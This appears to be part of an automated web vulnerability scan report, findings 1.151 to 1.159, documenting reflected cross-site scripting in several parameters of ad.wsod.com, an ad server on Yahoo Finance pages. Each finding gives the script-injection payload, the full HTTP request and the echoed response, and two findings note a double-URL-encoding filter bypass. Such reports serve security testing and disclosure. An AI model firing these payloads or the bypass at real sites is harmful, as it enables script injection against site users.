<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*3fdca"-alert(1)-"1deab7fe4c4">
...[SNIP]...

1.151. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e91ac"><script>alert(1)</script>76dc8954e3 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*e91ac"><script>alert(1)</script>76dc8954e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*e91ac"><script>alert(1)</script>76dc8954e3http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.152. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8f70"-alert(1)-"b9ed1c9b4d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*&d8f70"-alert(1)-"b9ed1c9b4d6=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2639

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
i/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*&d8f70"-alert(1)-"b9ed1c9b4d6=1">
...[SNIP]...

1.153. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a635f"><script>alert(1)</script>475f0068cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*&a635f"><script>alert(1)</script>475f0068cb6=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2669

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
i/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*&a635f"><script>alert(1)</script>475f0068cb6=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.154. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [ybt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e84e3</script><script>alert(1)</script>7b5373756af was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319e84e3</script><script>alert(1)</script>7b5373756af&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830270**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319e84e3</script><script>alert(1)</script>7b5373756af&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242
...[SNIP]...

1.155. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [yhdata parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7a0d</script><script>alert(1)</script>3fdf58037c9 was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=a7a0d</script><script>alert(1)</script>3fdf58037c9&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:38:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829936**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=a7a0d</script><script>alert(1)</script>3fdf58037c9&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW8
...[SNIP]...

1.156. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [yyob parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cda2b</script><script>alert(1)</script>5d10a5d9f71 was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=cda2b</script><script>alert(1)</script>5d10a5d9f71&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:41:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830077**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=cda2b</script><script>alert(1)</script>5d10a5d9f71&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFI
...[SNIP]...

1.157. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a663d</script><script>alert(1)</script>e9943327d44 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,a663d</script><script>alert(1)</script>e9943327d44&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830200**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,a663d</script><script>alert(1)</script>e9943327d44&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/
...[SNIP]...

1.158. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a1f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67917aa09da was submitted in the REST URL parameter 2. This input was echoed as 3a1f9"><script>alert(1)</script>67917aa09da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313573a1f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67917aa09da/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313573a1f9"><script>alert(1)</script>67917aa09da/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.159. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38f08%2522%253balert%25281%2529%252f%252fe64aa15b64c was submitted in the REST URL parameter 2. This input was echoed as 38f08";alert(1)//e64aa15b64c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135738f08%2522%253balert%25281%2529%252f%252fe64aa15b64c/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
